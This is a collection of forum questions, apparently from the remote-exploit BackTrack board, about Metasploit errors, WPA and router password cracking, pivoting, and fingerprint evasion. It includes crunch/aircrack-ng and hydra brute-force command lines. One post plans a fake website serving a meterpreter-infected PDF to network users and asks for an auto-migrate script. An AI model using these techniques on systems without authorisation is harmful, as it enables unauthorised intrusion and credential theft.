13:40 » remote-exploit
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 Service Pack 1 - lang:Unknown
[*] Could not determine the exact language pack
[*] Exploit completed, but no session was created.
Exploit target:
Id Name
-- ----
0 Automatic Targeting
How can I manually select the version of it + language?
My 2nd question is: how do I run the GUI of Metasploit in Windows?
Thanks.

4:51 » remote-exploit
Hi,
Last week I decided to check if my network was secure "enough". I got my WPA Handshake within seconds (which is quite acceptable). I then got down to trying to crack it.
I used all the dictionaries I could get my hands on to try and brute-force my way in but found nothing. So far so good. But I still wasn't convinced.
Through some social engineering, and after a few pints of lager, I tricked myself into telling me that the password was made of a 10 digit mixture of letters and numbers. I therefore tried a different way:
/pentest/password/crunch 10 10 "abcdefghijkl.......1234567890" | aircrack-ng ..... wpa-01.cap
After something like 4 days of scanning 385 keys/second it had barely just started the 3rd digit. This made me feel a lot safer.
Question: Are there "faster" ways other than crunch to get to a 10 digit password by checking every possible permutation, or may I assume that no one is going to have the time to crack my password (at least for the next few hundred years)?
Thanks

18:17 » remote-exploit
I am trying to crack an administrator password on a Windows XP 40 GB hard drive and everything goes well until /mnt/sda1/windows.
I checked in Konqueror and can navigate to /mnt/sda1/ but no files are shown. I know there are files there because I can boot into XP just fine...
Any suggestions?

16:54 » remote-exploit
Hello, I posted this in the OffSec PWB forum, but I don't think it's frequented that often hence no response. Apologies for the re-post if you've already come across this.
I've been doing some research into TCP wrappers recently, having noticed that a few services within the PWB lab are wrapped. As I understand it, TCP wrappers are a method of applying an ACL to a service, based on IP address.
I've figured that I can only talk to wrapped services if I'm bouncing through another host, but is there a reliable way of determining which hosts are in the ACL? The only ideas I've had on this so far seem to require some cache poisoning, which seems more than likely to mess things up (and poisoning is not allowed in the labs anyway!).
Spoofing my source address could be an option I suppose, but that would mean responses are directed elsewhere, I guess...
Can anyone share any insights into this? Even a nudge in the right direction would be appreciated.
Thanks
Chris

22:52 » remote-exploit
Hello all,
So a professor of my Computer Security course, together with the campus IT director, has offered my class a challenge. They've placed a file (aptly named secret.txt) with a secret word/phrase/something in a protected folder, and are offering extra credit if we can figure out what that word is. We aren't allowed to destroy anything or inhibit use of the server by other students, but past that anything (sans physical coercion and blackmail) goes.
The server is running SunOS 5.9. The folder, and all files within it that I know of, have 700 permissions, and both accounts I have access to are in the students group, whereas he's in the faculty group. We can print the shadowed /etc/passwd, but permission is denied to read or copy /etc/shadow.
We'll get credit whether we get caught or not, but ideas that get the secret word without alerting anybody are preferable. I'm familiar with Unix/Linux, but not so much with penetrating it. I come to you asking for advice and guidance on things to learn about that would aid me in this endeavor.
Thank you

5:52 » remote-exploit
Hi guys,
I have tried to use windows/browser/ie_aurora.
My internet connection is by a router, so my public IP address is different from the local one.
So when I use ie_aurora it works fine if I use 192.168.1.104 (local intranet address) but if I use my public address like 82.34.XXX.XXX as SRVHOST and LHOST:
msf exploit(ie_aurora) >
[-] Handler failed to bind to 82.34.XXX.XXX:4444
[-] Handler failed to bind to 0.0.0.0:4444
[-] Exploit failed: The address is already in use (0.0.0.0:4444).
[*] Server stopped.
Do you know how I can start the server if I am behind a router?
Thanks,
Mister|x

14:56 » remote-exploit
During a recent discussion with co-workers over lunch, the topic of offensive security came up. Preferring offensive security over anything else, I chimed in and explained the glorious difference in study and skill development methods between offensive and defensive security ideologies.
Offensive security and everything it encapsulates can be seen as a sport. There are techniques, tricks, methods, styles, different platforms, etc. all at your disposal to use to your liking. You're taking your keyboard, and turning it into a controller that can potentially do as much damage as you allow yourself to learn. Offensive security can be practiced. You can even increase the speed with which you attack. The list goes on.
Defensive security is boring. It's preventive. Write your policies, set up your controls, audit, report. ZZZZZ. Is this what I got into security for? No. Hardly. Not even close in fact. Anyway...
It came to mind that if offensive security can be considered a sport, why not train like an athlete? Yes, it's good to know the general concepts, tools, and how to use them, but how is that really effective in today's fast-paced cyber-terrorism world? If you're not trained to detect, react, and attack appropriately, you're bound to become useless. The combination of both knowledge and disciplined ability will be invaluable.
I would imagine that a training curriculum for offensive security could take the security skills you already have, and hone them into militant abilities and at the same time teach new methods. Not only would there be a program to follow for disciplined learning, but common offensive security tasks as well as attacks would become so ingrained into an individual that they would never have to stop, hesitate, or look up a procedure that was merely foggy or forgotten.
Does anyone have such a program or training curriculum?
How do you keep your skills sharp?
Would anyone be interested in developing such a curriculum with me?

12:17 » remote-exploit
Hi,
Is it possible to use the autopwn function to check whether a host could be exploited without exploiting it?
Or is there any other way to check a host against all exploits from Metasploit without compromising the host?

21:25 » remote-exploit
Hey guys, did a search but am looking for a more specific answer.
Right, I'm doing a little pentest on my AP which uses WPA-PSK.
I used my netbook to run BT4, then I successfully de-authed my targeted workstation (my desktop using wifi) and captured the 4-way handshake into a capture file.
I then used the default aircrack word list (password.lst) to try and crack the handshake.
I then get KEY FOUND [ penelope]
I assume this means all is good and it's been cracked; however, I know this is not the password as it's set to "Chronicles2".
Yet doing another capture file from my same BSSID, aircrack still tells me this is the key.
Why does aircrack tell me this is the key?
Thanks.
I do have permission to crack the WPA passcode as I own the network, pay the bill and set up the AP. Just in case anyone asks =]

22:10 » remote-exploit
Hello all,
My management has approved an audit of AD accounts looking for weak passwords.
Since I have the server and backups I would have access to the NTDS.DIT file; is there a way to extract password hashes directly from it? I'm trying to avoid running LC or fgdump on the Active Directory domain controller.
I've searched high and low and have not been able to find an answer.

19:56 » remote-exploit
I have a training lab setup and I am having trouble trying to double pivot. I have a firewall showing an FTP server through; I have exploited the FTP server, scanned internally, and found some hosts. I set up a pivot through the FTP server and exploited a host; this host has a second NIC and another host behind it. I have set up another route through the host but I cannot get any of my exploits to work against the second host.
Just wondering if anyone has done this before, or if it is even possible to double up pivots.
If needed I can give more details, IPs and such...
Thanks for any help

13:06 » remote-exploit
Suppose you wanted to fool OS fingerprinting tools such as xprobe, nmap, etc. in order to make the initial information gathering phase harder.
In BSD you can set net.inet.udp.blackhole or even better, use pf's traffic normalization options.
Even the Windows world has seen a few tools to make your win* box appear as running a different OS.
In Linux, on the other hand, we had IPpersonality (ippersonality.sourceforge.net), iplog (ojnk.sourceforge.net) and morph (synacklabs.net) but they're now quite old and only work with 2.4 kernels.
So I was wondering if any of you can suggest alternatives? pf for Linux, anyone? :rolleyes:

15:00 » remote-exploit
As the title states - does anyone have recommendations on a good EXE-binder?

15:25 » remote-exploit
Hi,
I hope this is the right place to ask this.
When I use Metasploit it works very well on my local network,
but when I want to pentest outside my local network it doesn't work :confused:
Can someone tell me why?

10:56 » remote-exploit
First let me say, yes I know this isn't an nmap support forum and that if nobody here knows the answer to my question I will go ask on an nmap mailing list or something.
To the point. I'm wondering if anyone knows the scope of NMAP NSE scripts? Are they always associated with a port or are there host-level NSEs as well? Think of this from the perspective of parsing NMAP XML output.
Personally I've only seen NSE output related to a port, but that doesn't mean that there isn't a host-level NSE output that I just haven't managed to trigger yet.
Edit: Yes I know I typo'd the subject line :(

13:04 » remote-exploit
I was recently asked a question about ODBC connections to a SQL server and the possibility of MITM or sniffing attacks. Can someone point me to something that discusses this? I've had a hard time finding much about it, hopefully someone here can dump some knowledge.
Thanks,
C

8:27 » remote-exploit
Hi !
I am running BT4 and I have Nessus and Nexpose installed for vulnerability scanning.
I also have an XP VMware machine running with a few "exploitable" protocols/software.
I followed a "tutorial" from offensive-security.
The machine is vulnerable to a well known Netbios exploit.
If I do a
Code: db_nmap 192.168.123.x
scan on the machine, followed by a simple yet powerful
Code: db_autopwn -p -e
I get a meterpreter session.
So far so good.
If I do scans with Nessus or Nexpose, both show me the high risk and possible exploit. So I was going to use the Nexpose and Nessus scan results within Metasploit.
I followed the tutorial linked above and the quick start guide at Nexpose, using the Nexpose plugin within Metasploit.
But in both situations I don't get the exploits listed. They don't find any matching exploits.
Anyone got an idea what I did wrong? Maybe there is something I forgot.
Ah, forgot to say:
db_vulns shows the exploits that Nexpose found, but db_autopwn -x -t doesn't show any and also doesn't run exploits against the machine.

6:48 » remote-exploit
This may be considered a stupid question and end up in the idiots' corner, but I'll take my chances. I am trying to automate an attack, with Perl. I use a system call to msfcli for the exploit, after checking that the port is open. I need to have another function run if the exploit did not fail. Where can I find some documentation for the return values from msfcli? I am not much of a programmer. The usual noob answer of a Google search has proven fruitless.

10:24 » remote-exploit
Hope this is the right place to ask this.
I have 3 computers on my subnet: a laptop running Windows XP with all the latest updates and ZoneAlarm firewall,
another PC running Windows XP SP2 with ZoneAlarm firewall,
and an Asus netbook running Ubuntu.
Now, when running Nmap on my subnet I've encountered 2 problems:
1. I can't get any signal from my first laptop running (updated) Win XP. I've disabled pinging (PN) and still nothing. I tried scanning the specific IP (also designated port 80) and still no result. Any idea how I can find this station with nmap?
2. When scanning my subnet I found that my router has an open port for a printer. I must say that I definitely didn't open any port on the router, plus when I looked where to disable this option on the router (from the browser GUI) I found nothing regarding any printers.
Any help would be welcomed.
Guy.

1:14 » remote-exploit
This is my first post and I am having a problem with the crunch password generator.
My problem:
I have tried to create a password list with crunch.
The command was:
./crunch 1 8 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt
It was creating for a long time. After the list was created, BackTrack suddenly signalled that I was low on disk space with 0 free space.
When I checked the properties of wordlist.txt I saw 69 GB. But my hard disk is only 80 GB.
MY QUESTION: Is it possible to generate a 100 MB-10 GB password list?
If it is possible, then how?
Thanks to all

13:40 » remote-exploit
Hey everyone!
First off I wanted to take a second and introduce myself. I just turned 21, working for IBM and going to school. I've been brought up around computers and have always loved 'em. I'm familiar with programming in PHP, SQL, HTML, C, C++, VB. Over about the last year, year and a half (since I first stumbled upon BackTrack), I've grown to have a very strong interest in penetration testing, computer security, etc. I'm looking to focus on learning more about it and getting certified in school.
As far as school, certificates, degrees, etc., I feel confused as to what people and companies are looking for. What qualifications are generally accepted and used across the board? What are the best ways to go about getting these certificates and degrees?
In order to grow more in my knowledge of systems, I've decided to start to put together my first 'powerful' machine at home. So far I've purchased:
ASUS P6T Deluxe V2 LGA 1366 Intel X58 ATX Intel Motherboard
Intel Core i7-920 Bloomfield 2.66GHz 4 x 256KB L2 Cache 8MB L3 Cache LGA 1366 130W Quad-Core Processor
CORSAIR CMPSU-750TX 750W ATX12V / EPS12V SLI Ready CrossFire Ready 80 PLUS Certified Active PFC Compatible with Core i7 Power Supply
I still need to get a graphics card as well as hard drives and RAM.
My idea is to make the system multiple boot, thinking Windows XP, Windows 7, and BackTrack. Within each OS I was going to run VMware Server, and then I'd have multiple VMs of different operating systems; that way I can boot into whatever primary OS, and then run VMs of whatever OS to use for attacking into.
I was wondering though, is this type of environment practical? Is there an amount of RAM you guys suggest? A specific type of graphics card? I'm not planning on playing games or anything, strictly using this for pen testing education and work. I was thinking of getting a beefy graphics card so I can generate rainbow tables and such faster, but how well will my processor be able to do that? How much should I spend on a good card? I'm hoping to be able to run and try anything and everything, from wireless security to operating system vulnerabilities, etc. I've also heard of different VMs that are set up strictly for attacking; are there any that you all have found to be more beneficial than others?
If there's any advice or questions you guys have for me, feel free to send any information my way.

23:02 » remote-exploit
Without using Windows Update.
Thanks.

19:23 » remote-exploit
Would just like to know what GeForce graphics card (and maybe processor) people are using and how many keys per second they are reaching with pyrit and CUDA for the hashes.
I only have an 8400GT and a dual-core Pentium D 3GHz and am reaching speeds of up to 700 p/s.
I have my eye on a shiny new GTX 260. If only I could afford 2, as my mobo has SLI capability. That WOULD be interesting.

12:24 » remote-exploit
Hi folks,
Many of you know how important the analysis and planning of the targeted environment is before attempting a successful penetration test.
I got the idea, and I am trying to draw the network design in order to visualize things better. Many tools can be used to do that; I used hping3 as it comes with BT4, others include tcptraceroute, firewalk-5.0 (discontinued by its developers...), etc.
What in fact is done by the program (hping3) is TCP/IP packet injection (with the SYN bit enabled) hop-by-hop until it reaches the final host (destination).
By sniffing the traffic, I could determine the TTL of the various responding hosts within the path until my packet "got there".
As far as I know the default behavior of a network would be to decrement the TTL of a device as I go deeper into the network (meaning that I am getting closer to the targeted IP). Like, for example, in a network with 3 devices (routers) before my targeted IP it would be something like this:
123.123.123.122 TTL 255 (my gateway)
123.123.123.133 TTL 254
123.123.123.144 TTL 253
177.177.177.177 TTL 124 (target IP)
Demonstrating that the host is Windows based (TTL starts at 128) and is placed 4 hops from me.
What I have noticed, though, is that sometimes the TTL increases. Like this:
123.123.123.122 TTL 255 (my gateway)
123.123.123.133 TTL 250
123.123.123.144 TTL 251
177.177.177.177 TTL 124 (target IP)
This is confusing, because I can't know for sure the network structure (whether they are placed beside or below/above each other).
Can someone here shed some light on this topic?
Thanks in advance!
sl33p

11:46 » remote-exploit
I am new to this field and I got a project of pentesting a small medical house. I need a pentesting non-disclosure agreement template so that I can be on the safe side. :(

2:14 » remote-exploit
Hello,
Is there a way to encode a PDF payload in Metasploit?
If yes, how?
Thanks in advance :)

22:24 » remote-exploit
I have been testing hydra on my Belkin router with the code: hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t 15 -f -s -vV 192.168.1.1 [http-get] /
I am trying the username admin because none is used; but I have tried many with the same results.
The results tell me a valid pair has been found and that the password is blank. This is the default for my router but I have changed the password and verified that it in fact works. Using the blank field as a password fails. Not sure what the issue is here with hydra or possibly my misuse of it.

8:16 » remote-exploit

4:20 » remote-exploit
I am really new to sniffing. My problem:
When I try ARP poisoning it does not work. The output: ARP poisoning does not support this media.
But when I tried direct sniffing it worked fine. But I need to sniff my target/victim IP.
My internet interface is ppp0.
How do I use it?
I love BackTrack.
Thank you

23:25 » remote-exploit
Hey guys, I'm a little new to BackTrack and am going to do some pen testing on my local network using social engineering if I can't find any vulnerabilities.
So what I have done so far is made a webserver that looks like another website that people on my network visit often. Then I have edited one of the links to open a .pdf that is infected with the reverse_tcp meterpreter payload.
So basically what I am wanting to do is this: since I'm not going to sit at my PC waiting for the people on my network to open it so I can quickly migrate to another process so I don't lose my session when they close the site, I want to write a script so that when I have the handler started and they open the PDF and the meterpreter session is opened, it will automatically run the migrate.rb script inside meterpreter without me being there to do it, so that it will keep the session until I get there or until they shut the computer down. I want someone to write a script for me and then a tutorial on how it works so I can learn how to replicate it and make similar scripts in the future.

6:12 » remote-exploit
Could someone please clarify what network mode I should use within VMware for the following scenario.
I have my de-ice VM images (and other vulnerable hosts) etc. on one physical machine in instances of VMware, and I have BackTrack VM images on another separate physical machine.
Both machines are on the one network via a wireless router and the VM images are set up in bridged mode.
I can find the de-ice host, however when I run an nmap scan it says all ports are filtered.
The documentation I have looked at seems to be aimed at the VM images all running on the same physical machine. Can somebody give me the correct network mode, i.e. host, NAT or bridged, so that I can pentest the virtual hosts on one physical machine using my BackTrack VM images on my other physical machine?
Please have pity on me with this one; I'm full of flu and not entirely on top form at the moment. So yes, in a way I'm being lazy and asking directly for the answer.
Merry Christmas and happy new year to all.
Much appreciated

0:25 » remote-exploit
Hello. I made an AutoIt script that installs the two packages needed to run nmap. I compiled it into an .exe, and it works when I run it locally from the command line.
When I connect to these same machines with a meterpreter shell and drop into a system shell, the same command that worked locally does not initiate an install. Instead, the command line seems to hang. A process appears which does not go away unless killed.
Do AutoIt scripts work without a Windows session (i.e. from a console)? Does the script not work if the user is SYSTEM? Does anyone recommend an alternative scanner that is lighter and easier to upload? I know it is possible to route Metasploit exploits through meterpreter sessions, but is it possible to route nmap scans through the same sessions?
Thanks in advance for your responses.

8:15 » remote-exploit
Well I only saw one other thread about Yersinia. First let me post my switch config.
Code: Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]: no
Press RETURN to get started.
Switch>en
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int
% Incomplete command.
Switch(config)#
Switch(config)#interface ?
FastEthernet FastEthernet IEEE 802.3
GigabitEthernet GigabitEthernet IEEE 802.3z
Multilink Multilink-group interface
Port-channel Ethernet Channel of interfaces
VLAN Switch VLAN Virtual Interface
Virtual-TokenRing Virtual TokenRing
Switch(config)#interface
% Incomplete command.
Switch(config)#interface Fast
Switch(config)#interface FastEthernet0/1
Switch(config-if)#?
Interface configuration commands:
arp Set arp type (arpa, probe, snap) or timeout
bandwidth Set bandwidth informational parameter
carrier-delay Specify delay for interface transitions
cdp CDP interface subcommands
custom-queue-list Assign a custom queue list to an interface
default Set a command to its defaults
delay Specify interface throughput delay
description Interface specific description
duplex Configure duplex operation.
exit Exit from interface configuration mode
fair-queue Enable Fai
help Description of the interactive help system
hold-queue Set hold queue depth
keepalive Enable keepalive
load-interval Specify interval for load calculation for an interface
logging Configure logging for interface
loopback Configure internal loopback on an interface
mac-address Manually set interface MAC address
max-reserved-bandwidth Maximum Reservable Bandwidth on an
media-type Interface media type
mtu Set the interface Maximum Transmission Unit (MTU)
mvr MVR per port configuration
negotiation Select Autonegotiation mode
no Negate a command or set its defaults
port Perform switch port configuration
power power configuration
priority-group Assign a priority group to an interface
random-detect Enable Weighted Random Ea
Interface
rmon Configure Remote Monitoring on an interface
service-policy Configure QoS Service Policy
shutdown Shutdown the selected interface
snmp Modify SNMP interface parameters
spanning-tree Spanning Tree Subsystem
speed Configure speed operation.
switchport Set switching mode characteristics
timeout Define timeout values for this interface
transmit-interface Assign a transmit interface to a receive-only interface
tx-queue-limit Configure card level transmit queue limit
udld Configure UDLD enabled or disabled and ignore global UDLD setting
Switch(config-if)#^Z
Switch#
00:13:29: %SYS-5-CONFIG_I: Configured from console by consoleshow vtp status
VTP Version : 2
Configuration Revision : 0
Maximum VLANs supported locally : 254
Number of existing VLANs : 5
VTP Operating Mode : Server
VTP Domain Name :
VTP Pruning Mode : Disabled
VTP V2 Mode : Disabled
VTP Traps Generation : Disabled
MD5 digest : 0xBF 0x86 0x94 0x45 0xFC 0xDF 0xB5 0x70
Configuration last modified by 0.0.0.0 at 0-0-00 00:00:00
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4,
Fa0/5, Fa0/6, Fa0/7, Fa0/8,
Fa0/9, Fa0/10, Fa0/11, Fa0/12,
Fa0/13, Fa0/14, Fa0/15, Fa0/16,
Fa0/17, Fa0/18, Fa0/19, Fa0/20,
Fa0/21, Fa0/22, Fa0/23, Fa0/24,
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 1002 1003
1002 fddi 101002 1500 - - - - - 1 1003
1003 tr 101003 1500 1005 0 - - srb 1 1002
1004 fdnet 101004 1500 - - 1 ibm - 0 0
1005 trnet 101005 1500 - - 1 ibm - 0 0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 2 name test
VLAN 2 added:
Name: test
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4,
Fa0/5, Fa0/6, Fa0/7, Fa0/8,
Fa0/9, Fa0/10, Fa0/11, Fa0/12,
Fa0/13, Fa0/14, Fa0/15, Fa0/16,
Fa0/17, Fa0/18, Fa0/19, Fa0/20,
Fa0/21, Fa0/22, Fa0/23, Fa0/24,
2 test active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 1002 1003
2 enet 100002 1500 - - - -
1002 fddi 101002 1500 - - - - - 1 1003
1003 tr 101003 1500 1005 0 - - srb 1 1002
1004 fdnet 101004 1500 - - 1 ibm - 0 0
1005 trnet 101005 1500 - - 1 ibm - 0 0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 3 name test2
VLAN 3 added:
Name: test2
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int vlan2
Switch(config-subif)#management
Switch(config-subif)#
Switch#
00:19:43: %SYS-5-CONFIG_I: Configured from console by consoleconfig t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int fa
Switch(config)#int fastEthernet 0/5
Switch(config-if)#switchport access vlan2
^
% Invalid input detected at '^' marker.
Switch(config-if)#switchport access vlan 2
Switch(confi
Switch(config)#inter
Switch(config)#interface fast
Switch(config)#interface fastEthernet 0/6
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/7
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/10
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/11
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEther
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#end
Switch#write
00:23:15: %SYS-5-CONFIG_I: Configured from console by console memorey
^
% Invalid input detected at '^' marker.
Switch#write memory
Building configuration...
[OK]
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4,
Fa0/8, Fa0/9, Fa0/13, Fa0/14,
Fa0/15, Fa0/16, Fa0/17, Fa0/18,
Fa0/19, Fa0/20, Fa0/21, Fa0/22,
Fa0/23, Fa0/24, Gi0/1, Gi0/2
2 test active Fa0/5, Fa0/6, Fa0/7
3 test2 active Fa0/10, Fa0/11, Fa0/12
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 1002 1003
2 enet 100002 1500 - - - - - 0 0
3 enet 100003 1500 - - - - - 0 0
1002 fddi 101002 1500 - - - - - 1 1003
1003 tr 101003 1500 1005 0 - - srb 1 1002
1004 fdnet 101004 1500 - - 1 ibm - 0 0
1005 trnet 101005 1500 - - 1 ibm - 0 0
Switch#
It's been a while since I worked with Cisco. I have computers on both VLANs pinging the gateway with 65500 bytes to simulate traffic, but I cannot seem to be able to catch a DTP packet. Am I doing something wrong? Do only certain protocols trigger DTP, and ICMP isn't one of them? Did I not configure DTP correctly on the switch? Any help is much appreciated; it's a Catalyst 3500 XL if that helps.

15:18 » remote-exploit
Hi,
Assume a Windows machine that did network scans on a specific port.
Multiple AVs were run on the machine and turned up nothing.
How would you prove/disprove that the machine is infected?
Sin-cerely,
Trol

5:21 » remote-exploit
Hi,
My friend provides a web hosting service... his web server has been attacked and someone succeeded in defacing one of the web pages. Since he knows that I have been working with security for the last year, he asked me to try to attack his website and to find out how the attacker sneaked into the server.
I started to gather some information about his hosting service. Then I started to scan his server and I found the following:
PORT STATE SERVICE VERSION
21/tcp open ftp PureFTPd
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.69
53/tcp open domain
80/tcp open http Apache httpd 2.2.14 ((Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11)
110/tcp open pop3 Courier pop3d
143/tcp open imap Courier Imapd (released 2008)
443/tcp open http Apache httpd 2.2.14 ((Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11)
465/tcp open ssl/smtp Exim smtpd 4.69
993/tcp open ssl/imap Courier Imapd (released 2008)
995/tcp open ssl/pop3 Courier pop3d
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.24
I tried to find some vulnerabilities for the above ports, so I searched on Google, milw0rm, exploit-db, packetstorm ... but sadly I couldn't find anything useful :(
I tried to check if one of the websites has a SQL injection vuln, but I found that none of the websites have a form to insert data; all the pages just display info, with no input from users.
Any help!?
thanks
-
-
16:15
»
remote-exploit
I've been testing the new vnc meterpreter script hdm just wrote, as per:
Twitter / HD Moore: RunVNC: quickly spawn a V ...
It works just fine. However, it pops a courtesy shell, so I added:
Code:
set DisableCourtesyShell TRUE
just before executing the exploit. The parameter was properly echoed, but the courtesy shell keeps showing.
Has anyone else tried this?
Edit: possibly this is because it's a meterpreter script, not a payload. Just wondering if there's a command available to disable it.
-
13:09
»
remote-exploit
Description of Malzilla: Malware hunting tool
hxxp://malzilla.sourceforge.net/
-
-
22:34
»
remote-exploit
Maybe a year ago I posted here about how I had added a dictionary generator to Aircrack. Since then I've had two people e-mail me asking me for the code for it...
I was thinking why would they be interested in it when they can just pipe the output of crunch into aircrack-ng?
But then I did: aircrack-ng --help
And it seems as though Aircrack doesn't have an option for reading from stdin. Is this really the case?
It wouldn't take more than half an hour to alter Aircrack so that it can read from stdin. If this is a sought-after feature then I'll alter the code myself.
By the way what program do people normally use for cracking WPA?
-
6:48
»
remote-exploit
Hey,
I'm currently testing a USB Vending Unit.
I've been looking around and I've found a good USB analyzer to record the USB data transfer between the software and the hardware, but I need to be able to play back the encounter to the device at a later date.
Is there any easy way to do this? Has anyone got any experience?
-
-
12:35
»
remote-exploit
I seem to be missing something, and need to be pointed in the right direction if you don't mind. In my lab I have a fully patched Vista and XP box and am attacking with a BT 4 box.
As they are fully patched, Metasploit attacks are a no-go. Now, I am assuming that some of the software on each box is exploitable, such as Firefox and the various P2P programs I have running.
Although I know what software I have installed, I don't know how an attacker would identify this. How could I find out, for instance, what software and version the box/user uses to surf the web or, say, download the top 40?
The Vista Box:
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5357/tcp open unknown
MAC Address: XXXXXXXX
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows Vista
OS details: Microsoft Windows Vista
Network Distance: 1 hop
The XP box:
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1026/tcp open LSA-or-nterm
2869/tcp closed unknown
5214/tcp open unknown
45100/tcp open unknown
MAC Address: XXXXXXXXX
Device type: general purpose|authentication server
Running (JUST GUESSING) : Microsoft Windows XP|2000|2003 (99%), Juniper Windows 2000 (90%)
Aggressive OS guesses: Microsoft Windows XP SP2 (99%), Microsoft Windows XP SP2 or SP3 (97%), Microsoft Windows 2000 SP4 or Windows XP SP2 (96%), Microsoft Windows 2003 Small Business Server (96%), Microsoft Windows Small Business Server 2003 (95%), Microsoft Windows XP Professional SP2 (95%), Microsoft Windows Server 2003 SP1 or SP2 (94%), Microsoft Windows XP Professional SP2 (firewall enabled) (94%), Microsoft Windows Server 2003 SP2 (94%), Microsoft Windows XP SP2 (firewall disabled) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Googling the ports tells me that LimeWire has 2 ports open on the XP box, which it does, but how would one know which version? Also, Winamp is running on this box (SHOUTcast radio) but this doesn't seem to be detectable, and neither does port 80 traffic. How can I gather further information?
Thanks
-
-
13:38
»
remote-exploit
I am in the process of preparing labs for a university web application security course. We will be working from the Web Application Hacker's Handbook (Stuttard & Pinto). I would like the labs to be challenging and fun, but I'm unsure about a few things. I like the idea of scenario-based challenges. The WebGoat framework is great, but I don't want labs with solutions readily available. I have looked briefly into DVL, WebGoat, and the De-ICE.net live CDs. The students will be in a lab with capable machines running VMWare. While standalone challenges are good, I'm also considering bringing in an element of competition with small groups. I thought this community would be an ideal place to brainstorm. Any insights or suggestions would be greatly appreciated. Thanks!
-
-
20:36
»
remote-exploit
Hey guys,
This is my first time posting, I believe. I'm a senior in high school on my way to take network security at UAT in Tempe, AZ. I've been trying to get to know Metasploit and it was a little daunting at first.
The situation is this: I have successfully exploited some of my own Win2K machines with the MS03-26 vulnerability. I have a friend's permission to test on his system. I have been trying browser_autopwn and other Internet Explorer exploits to no avail. I have them connect to my public IP address and my server recognizes it but always hangs on "Sending (exploit name)". Then I tried it on my own computer just to check if it was an issue on his end, and it still won't work.
-
-
23:18
»
remote-exploit
:) I have learned something about Metasploit from Offensive. But when I try to run it, at the end the console outputs:
Quote:
msf exploit(fp30reg_chunked) > exploit
[*] Creating overflow request for fp30reg.dll...
[*] Refreshing the remote dllhost.exe process...
[*] Trying to exploit fp30reg.dll (request 0 of 15)
[-] Exploit failed: Interrupted system call
[*] Exploit completed, but no session was created.
|
The last 2 lines, 1. "Exploit failed: Interrupted system call" and 2. "Exploit completed, but no session was created", show a problem. Is there anything wrong?
-
10:26
»
remote-exploit
Hello everyone.
I am very sorry to disturb you all. I'm a French computer scientist who has gotten very interested in pen testing, but even though I have programming skills, pen testing turns out to be quite difficult for me. Yet I am more than willing to learn.
I have set up an old Apache server on an equally old Debian for educational purposes. They are supposedly filled with holes, but I still haven't managed to exploit any of them.
This is why I'm asking you experienced lot for just a little help: suggested readings, keywords to look up on Google, etc.
Here's the info I have gathered through the information gathering process:
Open ports:
Port 21 (ftp) - ProFTPd 1.2.10
Port 22 (ssh) - OpenSSH_3..1p1 Debian-8.sarge.4
Port 23 (telnet) - FOXnet V03.05.0017
Port 25 (smtp) - ESMTP Exim 4.50
Port 80 (http) - Apache/1.3.33 (Debian GNU/Linux) PHP/4.3.10-16
Port 110 (pop3) - Qpopper 4.0.5
Port 143 (imap) - dovecot
I intentionally left the phpinfo() page and a phpMyAdmin (2.6.2) control panel. I ran a Nikto and a Nessus scan. They revealed that the PHP version is really outdated and insecure, and that there is an off-by-one buffer overflow in one of Apache's functions (still working on this one, to adapt the PoC to my version).
There is also an XSS flaw in the phpinfo() page, but social-engineering me into giving away my cookies was only fun for five minutes or so.
Thanks in advance for any advice!
-
